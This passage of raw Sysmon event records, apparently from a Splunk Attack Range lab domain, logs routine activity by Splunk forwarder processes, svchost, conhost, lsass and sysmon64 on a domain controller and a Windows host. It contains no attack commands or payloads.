Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103179Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.603{58E9C193-B1EB-615A-BD01-00000000FC01}6052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103178Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.555{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9286DADE15D9A7333FE1207F79F24589,SHA256=CED8D2F832340C02511755A434C850FE04547001DA1F1E61E861EC14968778C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081098Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B1EB-615A-3A01-00000000FD01}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081097Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081096Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081095Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081094Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081093Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081092Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081091Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081090Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081089Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081088Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B1EB-615A-3A01-00000000FD01}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081087Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.099{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B1EB-615A-3A01-00000000FD01}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081086Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.100{2FDD8D40-B1EB-615A-3A01-00000000FD01}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000103177Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.243{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49500-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000103176Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.243{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49500-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 23542300x8000000000000000103175Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.055{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED8419B557FBF89F22B66BD42C171CE6,SHA256=072A48182BC32D6689B3395A8280EC28543D680C4329628AED8FB60564AC2621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103174Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.055{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA9B4C400EEC225B703D203E15F08218,SHA256=6C84ECCE262CBCCCE129DD2DECE66F0C5F2F7E7441562292EF9336B5C4A79BC5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081103Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:58.604{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50004-false10.0.1.12-8000- 23542300x800000000000000081102Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:00.974{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC3F478EC2598C0CB09E3ABB671E1B74,SHA256=11A48782F974AF1E0C692EAD60FD0E0765F26A158F2A544C16121683241B505E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103202Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.977{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103201Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.977{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103200Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.977{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA8-615A-1600-00000000FC01}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103199Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.961{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED8419B557FBF89F22B66BD42C171CE6,SHA256=072A48182BC32D6689B3395A8280EC28543D680C4329628AED8FB60564AC2621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103198Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.586{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFAF01E0ABACF3E9632424286AF788F4,SHA256=000F2AC873D456C5EA4DFF6483103FB2F4B991950852D2369032C6BEAF4163C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081101Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:00.333{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18500C57143A85FFCA3C38740E68EDC4,SHA256=B990F168DAE0C78FCF2E8138BD021323899C815A5D61BF62D7328A88FB9B38AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081100Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:00.333{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C27D592AEE2CD3C8C31A749BD87CA5F0,SHA256=9A4D3392931DECE4F2A675EED4E6F9A10F5BA733400BC8F54C141DAC0D264C5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103197Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.493{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1EC-615A-BE01-00000000FC01}4888C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103196Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.493{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103195Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:00.493{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103194Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 